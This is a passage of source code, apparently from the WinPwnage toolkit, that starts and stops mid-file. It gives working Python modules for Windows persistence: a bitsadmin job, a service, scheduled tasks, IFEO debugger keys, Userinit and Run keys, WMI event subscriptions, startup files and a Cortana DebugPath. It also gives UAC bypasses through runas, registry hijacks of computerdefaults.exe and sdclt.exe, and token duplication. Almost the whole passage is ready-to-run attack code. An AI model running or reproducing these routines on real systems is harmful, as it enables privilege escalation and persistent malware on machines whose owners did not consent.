exit_code)) 34 | else: 35 | print_error("Unable to create job ({}) exit code ({})".format(name, exit_code)) 36 | 37 | exit_code = process().create("bitsadmin.exe", params="/addfile {} {} {}".format(name,os.path.join(information().system_directory(), 38 | "cmd.exe"),os.path.join(tempfile.gettempdir(),"cmd.exe")), get_exit_code=True) 39 | if exit_code == 0: 40 | print_success("Successfully added file ({}) to specified job ({}) exit code ({})".format(os.path.join(information().system_directory(), "cmd.exe"), name, exit_code)) 41 | else: 42 | print_error("Unable to add file ({}) to specified job ({}) exit code ({})".format(os.path.join(information().system_directory(), "cmd.exe"), name, exit_code)) 43 | 44 | exit_code = process().create("bitsadmin.exe", params='/SetNotifyCmdLine {} {} NULL'.format(name, payloads().exe(payload)[1]), get_exit_code=True) 45 | if exit_code == 0: 46 | print_success("Successfully attached payload ({}) to job ({}) exit code ({})".format(payloads().exe(payload)[1], name, exit_code)) 47 | else: 48 | print_error("Unable to attach payload ({}) to job ({}) exit code ({})".format(payloads().exe(payload)[1], name, exit_code)) 49 | 50 | exit_code = process().create("bitsadmin.exe", params="/Resume {}".format(name), get_exit_code=True) 51 | if exit_code == 0: 52 | print_success("Successfully initiated job ({}) exit code ({})".format(name, exit_code)) 53 | else: 54 | print_error("Unable to initiate job ({}) exit code ({})".format(name, exit_code)) 55 | 56 | time.sleep(5) 57 | 58 | pid = process().get_process_pid(os.path.split(payloads().exe(payload)[1])[1]) 59 | if pid: 60 | print_success("Successfully started payload PID: {}".format(pid)) 61 | else: 62 | print_error("Unable to start payload") 63 | else: 64 | print_error("Cannot proceed, invalid payload") 65 | return False 66 | else: 67 | print_info("Performing cleanup") 68 | exit_code = process().create("bitsadmin.exe", 69 | params="/complete {}".format(name), 70 | get_exit_code=True) 71 | 72 | if exit_code == 0: 73 | print_success("Successfully deleted job ({}) exit code ({})".format(name, exit_code)) 74 | else: 75 | print_error("Unable to delete job ({}) exit code ({})".format(name, exit_code)) 76 | -------------------------------------------------------------------------------- /winpwnage/functions/persist/persistMethod12.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | from winpwnage.core.winstructures import * 4 | import os 5 | 6 | persistMethod12_info = { 7 | "Description": "Persistence using Windows Service (SYSTEM privileges)", 8 | "Method": "Malicious Windows Service", 9 | "Id": "12", 10 | "Type": "Persistence", 11 | "Fixed In": "99999" if information().admin() == True else "0", 12 | "Works From": "7600", 13 | "Admin": True, 14 | "Function Name": "persistMethod12", 15 | "Function Payload": True, 16 | } 17 | 18 | def persistMethod12(payload, name="", add=True): 19 | if not information().admin(): 20 | print_error("Cannot proceed, we are not elevated") 21 | return False 22 | 23 | if payloads().exe(payload): 24 | servicename = bytes(r"WinPwnage", encoding="utf-8") 25 | localhost = bytes(r"\\localhost", encoding="utf-8") 26 | 27 | if add: 28 | print_info("Installing service") 29 | schSCManager = OpenSCManager(localhost, bytes(r"ServicesActive", encoding="utf-8"), 0x0001 | 0x0002) 30 | if not schSCManager: 31 | print_error("Error while connecting to the local service database using OpenSCManager: ({error})".format(error=GetLastError())) 32 | return False 33 | 34 | schService = CreateService(schSCManager, servicename, None, 0x00020000 | 0x00040000 | 0x0010, 0x00000010, 35 | 0x00000002, 0x00000000, bytes("rundll32.exe {dll},RouteTheCall {payload}".format(dll=os.path.join(information().system_directory(), 36 | "zipfldr.dll"), payload=payloads().exe(payload)[1]), encoding="utf-8"), None, None, None, None, None) 37 | if not schService: 38 | print_error("Error while installing our service using CreateService: ({error})".format(error=GetLastError())) 39 | return False 40 | else: 41 | print_success("Successfully installed service ({name}) to load {payload}".format(name=servicename, payload=payloads().exe(payload)[1])) 42 | 43 | CloseServiceHandle(schSCManager) 44 | CloseServiceHandle(schService) 45 | else: 46 | schSCManager = OpenSCManager(localhost, bytes(r"ServicesActive", encoding="utf-8"), 0x0001 | 0x0002) 47 | if not schSCManager: 48 | print_error("Error while connecting to the local service database using OpenSCManager: ({error})".format(error=GetLastError())) 49 | return False 50 | 51 | svcHandle = OpenService(schSCManager, servicename, 0x00010000) 52 | if DeleteService(svcHandle): 53 | print_success("Successfully deleted service ({name})".format(name=servicename)) 54 | else: 55 | print_error("Unable to delete service ({name})".format(name=servicename)) 56 | 57 | CloseServiceHandle(schSCManager) 58 | CloseServiceHandle(svcHandle) 59 | -------------------------------------------------------------------------------- /winpwnage/functions/persist/persistMethod2.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import datetime 4 | import tempfile 5 | import time 6 | import os 7 | 8 | persistMethod2_info = { 9 | "Description": "Persistence using schtasks.exe (SYSTEM privileges)", 10 | "Method": "Malicious scheduled task", 11 | "Id": "2", 12 | "Type": "Persistence", 13 | "Fixed In": "99999" if information().admin() == True else "0", 14 | "Works From": "7600", 15 | "Admin": True, 16 | "Function Name": "persistMethod2", 17 | "Function Payload": True, 18 | } 19 | 20 | def persistMethod2(payload, name="", add=True): 21 | if not information().admin(): 22 | print_error("Cannot proceed, we are not elevated") 23 | return False 24 | 25 | if add: 26 | if payloads().exe(payload): 27 | xml_template = """ 28 | 29 | 30 | {date} 31 | \\Microsoft\\Windows\\{name} 32 | 33 | 34 | 35 | true 36 | 37 | 38 | 39 | 40 | S-1-5-18 41 | HighestAvailable 42 | 43 | 44 | 45 | IgnoreNew 46 | false 47 | false 48 | false 49 | true 50 | false 51 | 52 | true 53 | false 54 | 55 | true 56 | true 57 | false 58 | false 59 | false 60 | PT0S 61 | 7 62 | 63 | PT2H 64 | 999 65 | 66 | 67 | 68 | 69 | "{payload}" 70 | 71 | 72 | """.format(date=str(datetime.datetime.now()).replace(' ', 'T'), name=name, payload=payloads().exe(payload)[1]) 73 | 74 | try: 75 | xml_file = open(os.path.join(tempfile.gettempdir(), "{name}.xml".format(name=name)), "w") 76 | xml_file.write(xml_template) 77 | xml_file.close() 78 | except Exception: 79 | return False 80 | 81 | time.sleep(5) 82 | 83 | if os.path.isfile(os.path.join(tempfile.gettempdir(), "{name}.xml".format(name=name))): 84 | if process().create("schtasks.exe", params="/create /xml {path} /tn {name}".format( 85 | path=os.path.join(tempfile.gettempdir(), "{name}.xml".format(name=name)), name=name)): 86 | print_success("Successfully created scheduled task, payload will run at login") 87 | else: 88 | print_error("Unable to create scheduled task") 89 | return False 90 | 91 | time.sleep(5) 92 | 93 | try: 94 | os.remove(os.path.join(tempfile.gettempdir(), "{name}.xml".format(name=name))) 95 | except Exception: 96 | return False 97 | else: 98 | print_error("Unable to create scheduled task, xml file not found") 99 | return False 100 | else: 101 | print_error("Cannot proceed, invalid payload") 102 | return False 103 | else: 104 | if process().create("schtasks.exe", params="/delete /tn {name} /f".format(name=name)): 105 | print_success("Successfully removed persistence") 106 | else: 107 | print_error("Unable to remove persistence") 108 | return False 109 | -------------------------------------------------------------------------------- /winpwnage/functions/persist/persistMethod3.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | 4 | persistMethod3_info = { 5 | "Description": "Persistence using image file execution option and magnifier.exe", 6 | "Method": "Image File Execution Options debugger and accessibility application", 7 | "Id": "3", 8 | "Type": "Persistence", 9 | "Fixed In": "99999" if information().admin() == True else "0", 10 | "Works From": "7600", 11 | "Admin": True, 12 | "Function Name": "persistMethod3", 13 | "Function Payload": True, 14 | } 15 | 16 | def persistMethod3(payload, name="", add=True): 17 | if not information().admin(): 18 | print_error("Cannot proceed, we are not elevated") 19 | return False 20 | 21 | if "64" in information().architecture(): 22 | magnify_key = "Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe" 23 | else: 24 | magnify_key = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe" 25 | 26 | accessibility_key = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility" 27 | 28 | if add: 29 | if payloads().exe(payload): 30 | if registry().modify_key(hkey="hklm", path=magnify_key, name="Debugger", value=payloads().exe(payload)[1], create=True): 31 | print_success("Successfully created Debugger key containing payload ({})".format(payloads().exe(payload)[1])) 32 | if registry().modify_key(hkey="hklm", path=accessibility_key, name="Configuration", value="magnifierpane", create=True): 33 | print_success("Successfully installed persistence, payload will run at login") 34 | return True 35 | print_error("Unable to install persistence") 36 | return False 37 | else: 38 | print_error("Cannot proceed, invalid payload") 39 | return False 40 | else: 41 | if registry().remove_key(hkey="hklm", path=accessibility_key, name="Configuration"): 42 | if registry().remove_key(hkey="hklm", path=magnify_key, delete_key=True): 43 | print_success("Successfully removed persistence") 44 | return True 45 | 46 | print_error("Unable to remove persistence") 47 | return False -------------------------------------------------------------------------------- /winpwnage/functions/persist/persistMethod4.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import os 4 | 5 | persistMethod4_info = { 6 | "Description": "Persistence using userinit key", 7 | "Method": "Registry key (UserInit) manipulation", 8 | "Id": "4", 9 | "Type": "Persistence", 10 | "Fixed In": "99999" if information().admin() == True else "0", 11 | "Works From": "7600", 12 | "Admin": True, 13 | "Function Name": "persistMethod4", 14 | "Function Payload": True, 15 | } 16 | 17 | def persistMethod4(payload, name="", add=True): 18 | if not information().admin(): 19 | print_error("Cannot proceed, we are not elevated") 20 | return False 21 | 22 | winlogon = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" 23 | if add: 24 | if payloads().exe(payload): 25 | p = os.path.join(information().system_directory(), "userinit.exe," + payloads().exe(payload)[1]) 26 | if registry().modify_key(hkey="hklm", path=winlogon, name="Userinit", value=p): 27 | print_success("Successfully created Userinit key containing payload ({})".format(payloads().exe(payload)[1])) 28 | print_success("Successfully installed persistence, payload will run at login") 29 | else: 30 | print_error("Unable to install persistence") 31 | return False 32 | else: 33 | print_error("Cannot proceed, invalid payload") 34 | return False 35 | else: 36 | if registry().remove_key(hkey="hklm", path=winlogon, name="Userinit"): 37 | print_success("Successfully removed persistence") 38 | else: 39 | print_error("Unable to remove persistence") 40 | return False 41 | -------------------------------------------------------------------------------- /winpwnage/functions/persist/persistMethod5.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | 4 | persistMethod5_info = { 5 | "Description": "Persistence using HKCU run key", 6 | "Method": "Registry key (HKCU Run) manipulation", 7 | "Id": "5", 8 | "Type": "Persistence", 9 | "Fixed In": "99999", 10 | "Works From": "7600", 11 | "Admin": False, 12 | "Function Name": "persistMethod5", 13 | "Function Payload": True, 14 | } 15 | 16 | def persistMethod5(payload, name="", add=True): 17 | if add: 18 | if payloads().exe(payload): 19 | if registry().modify_key(hkey="hkcu", path="Software\\Microsoft\\Windows\\CurrentVersion\\Run", name=name, value=payloads().exe(payload)[1]): 20 | print_success("Successfully created {name} key containing payload ({payload})".format(name=name, payload=payloads().exe(payload)[1])) 21 | print_success("Successfully installed persistence, payload will run at login") 22 | else: 23 | print_error("Unable to install persistence") 24 | return False 25 | else: 26 | print_error("Cannot proceed, invalid payload") 27 | return False 28 | else: 29 | if registry().remove_key(hkey="hkcu", path="Software\\Microsoft\\Windows\\CurrentVersion\\Run", name=name): 30 | print_success("Successfully removed persistence") 31 | else: 32 | print_error("Unable to remove persistence") 33 | return False -------------------------------------------------------------------------------- /winpwnage/functions/persist/persistMethod6.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | 4 | persistMethod6_info = { 5 | "Description": "Persistence using HKLM run key", 6 | "Method": "Registry key (HKLM Run) manipulation", 7 | "Id": "6", 8 | "Type": "Persistence", 9 | "Fixed In": "99999" if information().admin() == True else "0", 10 | "Works From": "7600", 11 | "Admin": True, 12 | "Function Name": "persistMethod6", 13 | "Function Payload": True, 14 | } 15 | 16 | def persistMethod6(payload, name="", add=True): 17 | if not information().admin(): 18 | print_error("Cannot proceed, we are not elevated") 19 | return False 20 | 21 | if "64" in information().architecture(): 22 | kpath = "Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" 23 | else: 24 | kpath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" 25 | 26 | if add: 27 | if payloads().exe(payload): 28 | if registry().modify_key(hkey="hklm", path=kpath, name=name, value=payloads().exe(payload)[1]): 29 | print_success("Successfully created {name} key containing payload ({payload})".format(name=name, payload=payloads().exe(payload)[1])) 30 | print_success("Successfully installed persistence, payload will run at login") 31 | else: 32 | print_error("Unable to install persistence") 33 | return False 34 | else: 35 | print_error("Cannot proceed, invalid payload") 36 | return False 37 | else: 38 | if registry().remove_key(hkey="hklm", path=kpath, name=name): 39 | print_success("Successfully removed persistence") 40 | else: 41 | print_error("Unable to remove persistence") 42 | return False 43 | -------------------------------------------------------------------------------- /winpwnage/functions/persist/persistMethod7.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import time 4 | 5 | persistMethod7_info = { 6 | "Description": "Persistence using wmic.exe (SYSTEM privileges)", 7 | "Method": "Malicious mof file using EventFilter EventConsumer and binding", 8 | "Id": "7", 9 | "Type": "Persistence", 10 | "Fixed In": "99999" if information().admin() == True else "0", 11 | "Works From": "7600", 12 | "Admin": True, 13 | "Function Name": "persistMethod7", 14 | "Function Payload": True, 15 | } 16 | 17 | def persistMethod7(payload, name="", add=True): 18 | if not information().admin(): 19 | print_error("Cannot proceed, we are not elevated") 20 | return False 21 | 22 | cmds = { 23 | 'create': { 24 | ('__EventFilter', '/namespace:"\\\\root\\subscription" PATH __EventFilter CREATE Name="{name}", EventNameSpace="root\\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA \'Win32_PerfFormattedData_PerfOS_System\' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 360"'), 25 | ('CommandLineEventConsumer', '/namespace:"\\\\root\\subscription" PATH CommandLineEventConsumer CREATE Name="{name}", ExecutablePath="{path}", CommandLineTemplate="{path}"'), 26 | ('__FilterToConsumerBinding', '/namespace:"\\\\root\\subscription" PATH __FilterToConsumerBinding CREATE Filter=\'__EventFilter.Name="{name}"\', Consumer=\'CommandLineEventConsumer.Name="{name}"\''), 27 | }, 28 | 'delete': { 29 | ('__EventFilter', '/namespace:"\\\\root\\subscription" PATH __EventFilter WHERE Name="{name}" DELETE'), 30 | ('CommandLineEventConsumer', '/namespace:"\\\\root\\subscription" PATH CommandLineEventConsumer WHERE Name="{name}" DELETE'), 31 | ('__FilterToConsumerBinding', '/namespace:"\\\\root\\subscription" PATH __FilterToConsumerBinding WHERE Filter=\'__EventFilter.Name="{name}"\' DELETE'), 32 | } 33 | } 34 | 35 | if add: 36 | if not payloads().exe(payload): 37 | print_error("Cannot proceed, invalid payload") 38 | return False 39 | 40 | action = "create" 41 | else: 42 | action = "delete" 43 | 44 | for i, cmd in cmds[action]: 45 | exit_code = process().create('wmic.exe', params=cmd.format(name=name, path=payloads().exe(payload)[1]), get_exit_code=True) 46 | if exit_code == 0: 47 | print_success("Successfully {action} {event} (exit code: {code})".format(action=action, event=i, code=exit_code)) 48 | else: 49 | print_error("Unable to {action} {event} (exit code: {code})".format(action=action, event=i, code=exit_code)) 50 | 51 | time.sleep(3) 52 | -------------------------------------------------------------------------------- /winpwnage/functions/persist/persistMethod8.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import os 4 | 5 | persistMethod8_info = { 6 | "Description": "Persistence using startup files", 7 | "Method": "Malicious lnk file in startup directory", 8 | "Id": "8", 9 | "Type": "Persistence", 10 | "Fixed In": "99999", 11 | "Works From": "7600", 12 | "Admin": False, 13 | "Function Name": "persistMethod8", 14 | "Function Payload": True, 15 | } 16 | 17 | def persistMethod8(payload, name="", add=True): 18 | appdata = os.path.expandvars("%AppData%") 19 | startup_dir = os.path.join(appdata, r'Microsoft\\Windows\\Start Menu\\Programs\\Startup') 20 | if not os.path.exists(startup_dir): 21 | print_error("Start up directory not found: {directory}".format(directory=startup_dir)) 22 | return False 23 | 24 | startup_file_path = os.path.join(startup_dir, '{name}.eu.url'.format(name=name)) 25 | if add: 26 | if payloads().exe(payload): 27 | with open(startup_file_path, 'w') as f: 28 | f.write('\n[InternetShortcut]\nURL=file:///{payload}\n'.format(payload=payloads().exe(payload)[1])) 29 | print_success('Startup file created: {path}'.format(path=startup_file_path)) 30 | print_success("Successfully installed persistence, payload will run at login") 31 | return True 32 | else: 33 | print_error("Cannot proceed, invalid payload") 34 | return False 35 | else: 36 | print_info("Removing startup file ({path})".format(path=startup_file_path)) 37 | try: 38 | os.remove(startup_file_path) 39 | print_success("Successfully removed persistence") 40 | except Exception: 41 | print_error("Unable to remove persistence") 42 | return False 43 | -------------------------------------------------------------------------------- /winpwnage/functions/persist/persistMethod9.py: -------------------------------------------------------------------------------- 1 | try: 2 | import _winreg # Python 2 3 | except ImportError: # Python 3 4 | import winreg as _winreg 5 | from winpwnage.core.prints import * 6 | from winpwnage.core.utils import * 7 | import os 8 | 9 | #https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/ 10 | 11 | persistMethod9_info = { 12 | "Description": "Persistence using Cortana windows app", 13 | "Method": "Registry key (Class) manipulation", 14 | "Id": "9", 15 | "Type": "Persistence", 16 | "Fixed In": "99999", 17 | "Works From": "14393", 18 | "Admin": False, 19 | "Function Name": "persistMethod9", 20 | "Function Payload": True, 21 | } 22 | 23 | def find_cortana(): 24 | index = 0 25 | cortana_version = [] 26 | 27 | try: 28 | key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, "Software\Classes\ActivatableClasses\Package", 0, _winreg.KEY_READ) 29 | except Exception as error: 30 | print_error("Unable to open registry key, exception was raised: {}".format(error)) 31 | return False 32 | 33 | try: 34 | num = _winreg.QueryInfoKey(key)[0] 35 | for x in range(0, num): 36 | if "Microsoft.Windows.Cortana_" in _winreg.EnumKey(key, x): 37 | cortana_version.append(_winreg.EnumKey(key, x)) 38 | break 39 | except WindowsError as error: 40 | pass 41 | return cortana_version 42 | 43 | def persistMethod9(payload, add=True): 44 | try: 45 | kpath = os.path.join("Software\Classes\ActivatableClasses\Package", 46 | find_cortana()[0], 47 | "DebugInformation\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca") 48 | except IndexError: 49 | print_error("Unable to add persistence, Cortana is unavailable on this system") 50 | return False 51 | 52 | if add: 53 | if payloads().exe(payload): 54 | if registry().modify_key(hkey="hkcu", path=kpath, name="DebugPath", value=payloads().exe(payload)[1], create=True): 55 | print_success("Successfully created DebugPath key containing payload ({payload})".format(payload=payloads().exe(payload)[1])) 56 | print_success("Successfully installed persistence, payload will run at login") 57 | else: 58 | print_error("Unable to add persistence, exception was raised: {}".format(error)) 59 | return False 60 | else: 61 | print_error("Cannot proceed, invalid payload") 62 | return False 63 | else: 64 | if registry().remove_key(hkey="hkcu", path=kpath, name="DebugPath"): 65 | print_success("Successfully removed persistence") 66 | else: 67 | print_error("Unable to remove persistence") 68 | return False 69 | -------------------------------------------------------------------------------- /winpwnage/functions/uac/__init__.py: -------------------------------------------------------------------------------- 1 | #init -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod1.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.utils import * 2 | from winpwnage.core.prints import * 3 | 4 | uacMethod1_info = { 5 | "Description": "UAC bypass using runas", 6 | "Method": "Windows API, this only works if UAC is set to never notify", 7 | "Id": "1", 8 | "Type": "UAC bypass", 9 | "Fixed In": "99999" if information().uac_level() == 1 else "0", 10 | "Works From": "7600", 11 | "Admin": False, 12 | "Function Name": "uacMethod1", 13 | "Function Payload": True, 14 | } 15 | 16 | def uacMethod1(payload): 17 | if payloads().exe(payload): 18 | params = payloads().exe(payload)[1].replace(payloads().exe(payload)[1].split(' ', 1)[0], '').lstrip() 19 | payload = payloads().exe(payload)[1].split(' ', 1)[0] 20 | 21 | if process().runas(payload=payload, params=params): 22 | print_success("Successfully elevated process ({payload} {params})".format(payload=payload, params=params)) 23 | else: 24 | print_error("Unable to elevate process ({payload} {params})".format(payload=payload, params=params)) 25 | return False 26 | else: 27 | print_error("Cannot proceed, invalid payload") 28 | return False 29 | -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod10.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import time 4 | import os 5 | 6 | uacMethod10_info = { 7 | "Description": "UAC bypass using computerdefaults.exe", 8 | "Method": "Registry key (Class) manipulation", 9 | "Id": "10", 10 | "Type": "UAC bypass", 11 | "Fixed In": "99999" if not information().uac_level() == 4 else "0", 12 | "Works From": "10240", 13 | "Admin": False, 14 | "Function Name": "uacMethod10", 15 | "Function Payload": True, 16 | } 17 | 18 | def uacMethod10_cleanup(path): 19 | print_info("Performing cleaning") 20 | if registry().remove_key(hkey="hkcu", path=path, name=None, delete_key=True): 21 | print_success("Successfully cleaned up") 22 | print_success("All done!") 23 | else: 24 | print_error("Unable to cleanup") 25 | return False 26 | 27 | def uacMethod10(payload): 28 | if payloads().exe(payload): 29 | path = "Software\\Classes\\ms-settings\\shell\\open\\command" 30 | 31 | if registry().modify_key(hkey="hkcu", path=path, name=None, value=payloads().exe(payload)[1], create=True): 32 | if registry().modify_key(hkey="hkcu", path=path, name="DelegateExecute", value=None, create=True): 33 | print_success("Successfully created Default and DelegateExecute key containing payload ({payload})".format(payload=os.path.join(payloads().exe(payload)[1]))) 34 | else: 35 | print_error("Unable to create registry keys") 36 | for x in Constant.output: 37 | if "error" in x: 38 | uacMethod10_cleanup(path) 39 | return False 40 | else: 41 | print_error("Unable to create registry keys") 42 | return False 43 | 44 | time.sleep(5) 45 | 46 | print_info("Disabling file system redirection") 47 | with disable_fsr(): 48 | print_success("Successfully disabled file system redirection") 49 | if process().create("computerdefaults.exe"): 50 | print_success("Successfully spawned process ({})".format(os.path.join(payloads().exe(payload)[1]))) 51 | time.sleep(5) 52 | uacMethod10_cleanup(path) 53 | else: 54 | print_error("Unable to spawn process ({})".format(os.path.join(payloads().exe(payload)[1]))) 55 | for x in Constant.output: 56 | if "error" in x: 57 | uacMethod10_cleanup(path) 58 | return False 59 | else: 60 | print_error("Cannot proceed, invalid payload") 61 | return False -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod11.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | from winpwnage.core.winstructures import * 4 | 5 | #Creds to: https://gist.github.com/highsenburger69/b86eb4db41e651a6518fd61d88aa9f91 6 | 7 | uacMethod11_info = { 8 | "Description": "UAC bypass using token manipulation", 9 | "Method": "Token manipulation", 10 | "Id": "11", 11 | "Type": "UAC bypass", 12 | "Fixed In": "17686" if not information().uac_level() == 4 else "0", 13 | "Works From": "7600", 14 | "Admin": False, 15 | "Function Name": "uacMethod11", 16 | "Function Payload": True, 17 | } 18 | 19 | def uacMethod11(payload): 20 | if information().admin(): 21 | print_error("Unable to proceed, we are already elevated") 22 | return False 23 | 24 | if payloads().exe(payload): 25 | print_info("Launching elevated process") 26 | ShellExecute = ShellExecuteInfoW() 27 | ShellExecute.cbSize = sizeof(ShellExecute) 28 | ShellExecute.fMask = 0x00000040 29 | ShellExecute.lpFile = u"wusa.exe" 30 | ShellExecute.nShow = 0 31 | 32 | if ShellExecuteEx(byref(ShellExecute)) == 0: 33 | print_error("Error while triggering elevated binary using ShellExecuteEx: {}".format(GetLastError())) 34 | else: 35 | print_success("Successfully started process") 36 | 37 | print_info("Grabbing token") 38 | hToken = HANDLE(c_void_p(-1).value) 39 | if NtOpenProcessToken(ShellExecute.hProcess, 0x02000000, byref(hToken)) == STATUS_UNSUCCESSFUL: 40 | print_error("Error while opening target process token using NtOpenProcessToken: {}".format(GetLastError())) 41 | 42 | TerminateProcess(ShellExecute.hProcess, -1) 43 | WaitForSingleObject(ShellExecute.hProcess, -1) 44 | 45 | print_info("Opening token of elevated process") 46 | newhToken = HANDLE(c_void_p(-1).value) 47 | SECURITY_ATTRIBUTE = SECURITY_ATTRIBUTES() 48 | 49 | if DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, byref(SECURITY_ATTRIBUTE), 50 | SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, 51 | TOKEN_TYPE.TokenPrimary, byref(newhToken)) == STATUS_UNSUCCESSFUL: 52 | print_error("Error while duplicating Primary token using DuplicateTokenEx: {}".format(GetLastError())) 53 | 54 | print_info("Duplicating primary token") 55 | mlAuthority = SID_IDENTIFIER_AUTHORITY((0, 0, 0, 0, 0, 16)) 56 | pIntegritySid = LPVOID() 57 | 58 | if RtlAllocateAndInitializeSid(byref(mlAuthority), 1, IntegrityLevel.SECURITY_MANDATORY_MEDIUM_RID, 59 | 0, 0, 0, 0, 0, 0, 0, byref(pIntegritySid)) == STATUS_UNSUCCESSFUL: 60 | print_error("Error while initializing Medium IL SID using RtlAllocateAndInitializeSid: {}".format(GetLastError())) 61 | 62 | print_info("Initializing a SID for Medium Integrity level") 63 | SID_AND_ATTRIBUTE = SID_AND_ATTRIBUTES() 64 | SID_AND_ATTRIBUTE.Sid = pIntegritySid 65 | SID_AND_ATTRIBUTE.Attributes = GroupAttributes.SE_GROUP_INTEGRITY 66 | TOKEN_MANDATORY = TOKEN_MANDATORY_LABEL() 67 | TOKEN_MANDATORY.Label = SID_AND_ATTRIBUTE 68 | 69 | if NtSetInformationToken(newhToken, TOKEN_INFORMATION_CLASS.TokenIntegrityLevel, 70 | byref(TOKEN_MANDATORY), sizeof(TOKEN_MANDATORY)) == STATUS_UNSUCCESSFUL: 71 | print_error("Error while setting medium IL token using NtSetInformationToken: {}".format(GetLastError())) 72 | 73 | print_info("Now we are lowering the token's integrity level from High to Medium") 74 | hLuaToken = HANDLE(c_void_p(-1).value) 75 | if NtFilterToken(newhToken, 0x4, None, None, None, byref(hLuaToken)) == STATUS_UNSUCCESSFUL: 76 | print_error("Error while creating a restricted token using NtFilterToken: {}".format(GetLastError())) 77 | 78 | print_info("Creating restricted token") 79 | ImpersonateLoggedOnUser(hLuaToken) 80 | 81 | print_info("Impersonating logged on user") 82 | lpStartupInfo = STARTUPINFO() 83 | lpStartupInfo.cb = sizeof(lpStartupInfo) 84 | lpProcessInformation = PROCESS_INFORMATION() 85 | lpStartupInfo.dwFlags = 0x00000001 86 | lpStartupInfo.wShowWindow = 5 87 | lpApplicationName = payloads().exe(payload)[1] 88 | 89 | if CreateProcessWithLogonW(u"aaa", u"bbb", u"ccc",0x00000002, lpApplicationName, None, 90 | 0x00000010, None, None, byref(lpStartupInfo), byref(lpProcessInformation)) == 0: 91 | print_error("Error while triggering admin payload using CreateProcessWithLogonW: {}".format(GetLastError())) 92 | else: 93 | print_success("Successfully executed payload with PID: {}".format(lpProcessInformation.dwProcessId)) 94 | else: 95 | print_error("Cannot proceed, invalid payload") 96 | -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod12.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import time 4 | import os 5 | 6 | #http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass 7 | 8 | uacMethod12_info = { 9 | "Description": "UAC bypass using sdclt.exe (Folder)", 10 | "Method": "Registry key (Class) manipulation", 11 | "Id": "12", 12 | "Type": "UAC bypass", 13 | "Fixed In": "99999" if not information().uac_level() == 4 else "0", 14 | "Works From": "14393", 15 | "Admin": False, 16 | "Function Name": "uacMethod12", 17 | "Function Payload": True, 18 | } 19 | 20 | def uacMethod12_cleanup(path): 21 | print_info("Performing cleaning") 22 | if registry().remove_key(hkey="hkcu", path=path, name=None, delete_key=True): 23 | print_success("Successfully cleaned up") 24 | print_success("All done!") 25 | else: 26 | print_error("Unable to cleanup") 27 | return False 28 | 29 | def uacMethod12(payload): 30 | if payloads().exe(payload): 31 | path = "Software\\Classes\\Folder\\shell\\open\\command" 32 | 33 | if registry().modify_key(hkey="hkcu", path=path, name=None, value=payloads().exe(payload)[1], create=True): 34 | if registry().modify_key(hkey="hkcu", path=path, name="DelegateExecute", value=None, create=True): 35 | print_success("Successfully created Default and DelegateExecute key containing payload ({payload})".format(payload=os.path.join(payloads().exe(payload)[1]))) 36 | else: 37 | print_error("Unable to create registry keys") 38 | for x in Constant.output: 39 | if "error" in x: 40 | uacMethod12_cleanup(path) 41 | return False 42 | else: 43 | print_error("Unable to create registry keys") 44 | return False 45 | 46 | time.sleep(5) 47 | 48 | print_info("Disabling file system redirection") 49 | with disable_fsr(): 50 | print_success("Successfully disabled file system redirection") 51 | if process().create("sdclt.exe"): 52 | print_success("Successfully spawned process ({})".format(payloads().exe(payload)[1])) 53 | time.sleep(5) 54 | uacMethod12_cleanup(path) 55 | else: 56 | print_error("Unable to spawn process ({})".format(os.path.join(payloads().exe(payload)[1]))) 57 | for x in Constant.output: 58 | if "error" in x: 59 | uacMethod12_cleanup(path) 60 | return False 61 | else: 62 | print_error("Cannot proceed, invalid payload") 63 | return False -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod13.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import tempfile 4 | import ctypes 5 | import time 6 | import os 7 | 8 | #https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ 9 | 10 | uacMethod13_info = { 11 | "Description": "UAC bypass using cmstp.exe", 12 | "Method": "Malicious ini file", 13 | "Id": "13", 14 | "Type": "UAC bypass", 15 | "Fixed In": "99999" if not information().uac_level() == 4 else "0", 16 | "Works From": "7600", 17 | "Admin": False, 18 | "Function Name": "uacMethod13", 19 | "Function 